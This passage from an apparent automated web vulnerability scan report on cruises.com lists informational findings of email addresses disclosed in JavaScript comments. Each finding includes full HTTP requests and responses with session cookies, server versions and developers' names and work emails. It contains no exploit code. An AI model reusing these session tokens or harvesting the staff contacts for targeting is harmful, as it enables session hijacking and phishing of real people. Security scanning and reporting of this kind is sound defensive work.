Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:28 GMT
Accept-Ranges: bytes
ETag: "e6d171e3d318c91:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:10 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.12. http://www.cruises.com/Code/javascript/general/browserdetect_lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /Code/javascript/general/browserdetect_lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/browserdetect_lite.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4269
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:29 GMT
Accept-Ranges: bytes
ETag: "3e56f7e3d318c91:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:23 GMT
Content-Length: 4269

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...
20.13. http://www.cruises.com/Code/javascript/general/event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /Code/javascript/general/event.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/event.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.14.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 1267
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Sep 2008 14:44:29 GMT
Accept-Ranges: bytes
ETag: "272ff0e3d318c91:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:44:05 GMT
Content-Length: 1267

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 11/17/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects that handle event-based programming
//                            in javascript
//--------------
...[SNIP]...
20.14. http://www.cruises.com/Code/javascript/general/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /Code/javascript/general/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/general/validation.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 2687
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 09:32:35 GMT
Accept-Ranges: bytes
ETag: "fe68535875cc1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:23 GMT
Content-Length: 2687


// Description : General javascript validation functions.
// File            : validation.js
// Created By    : Sanjeev Joshi(joshis@NLG.com)
// Created Date : 06/12/03


// The possible options for the zip to be invalid are
// 00000 or -ve number (parseFloat(vZip)<=0)
// // "." in the Zip entered ((vZip.indexOf('.') !== -1) )
// Al
...[SNIP]...
20.15. http://www.cruises.com/Code/javascript/validation/validating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /Code/javascript/validation/validating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/javascript/validation/validating.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4597
Content-Type: application/x-javascript
Last-Modified: Thu, 19 Aug 2010 09:39:38 GMT
Accept-Ranges: bytes
ETag: "d657b71823fcb1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:24 GMT
Content-Length: 4597

// validates email sign up form
// $Header: /WebSites/library/javascript/validation/validating.js 1 7/28/10 9:07a Mccusker $

function validating(){
   if ((document.EmailForm.firstname.
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.16. http://www.cruises.com/lib/JavaScript/general/browserdetect_lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/JavaScript/general/browserdetect_lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/JavaScript/general/browserdetect_lite.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 4323
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 09:29:42 GMT
Accept-Ranges: bytes
ETag: "301eda8f842cc1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:22 GMT
Content-Length: 4323

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...
20.17. http://www.cruises.com/lib/javascript/general/event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/javascript/general/event.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/event.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 1267
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Nov 2007 10:06:49 GMT
Accept-Ranges: bytes
ETag: "30fac88e6f32c81:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:32 GMT
Content-Length: 1267

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 11/17/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects that handle event-based programming
//                            in javascript
//--------------
...[SNIP]...
20.18. http://www.cruises.com/lib/javascript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/javascript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/msgbox.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Mon, 10 Sep 2007 17:51:46 GMT
Accept-Ranges: bytes
ETag: "f131a141d3f3c71:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:32 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.19. http://www.cruises.com/lib/javascript/general/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/javascript/general/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/validation.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 2695
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 09:32:29 GMT
Accept-Ranges: bytes
ETag: "d54f8731875cc1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:33 GMT
Content-Length: 2695


// Description : General javascript validation functions.
// File            : validation.js
// Created By    : Sanjeev Joshi(joshis@NLG.com)
// Created Date : 06/12/03


// The possible options for the zip to be invalid are
// 00000 or -ve number (parseFloat(vZip)<=0)
// // "." in the Zip entered ((vZip.indexOf('.') !== -1) )
// Al
...[SNIP]...
20.20. http://www.cruises.com/lib/javascript/validation/messagingobjects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/javascript/validation/messagingobjects.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/messagingobjects.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 16882
Content-Type: application/x-javascript
Last-Modified: Thu, 29 May 2008 12:45:00 GMT
Accept-Ranges: bytes
ETag: "ca85bcce89c1c81:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:10 GMT
Content-Length: 16882

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 10/14/2003
// MODIFICATION HISTORY:
// PURPOSE: this file contains a set of validation objects
// and a message buffer.
//-
...[SNIP]...
20.21. http://www.cruises.com/lib/javascript/validation/validating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /lib/javascript/validation/validating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/validating.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 6847
Content-Type: application/x-javascript
Last-Modified: Mon, 07 Feb 2011 22:19:04 GMT
Accept-Ranges: bytes
ETag: "f88580715c7cb1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:34 GMT
Content-Length: 6847

// validates email sign up form
// $Header: /WebSites/library/javascript/validation/validating.js 4 1/25/11 2:21p Mccusker $

function validating(){
   if ((document.EmailForm.firstname.
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.22. http://www.cruises.com/results.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The following email address was disclosed in the response:

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:05 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:44:06 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:46:06 GMT;path=/
Cache-Control: private
Content-Length: 177692


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
d.");
           document.EmailForm1.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm1.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
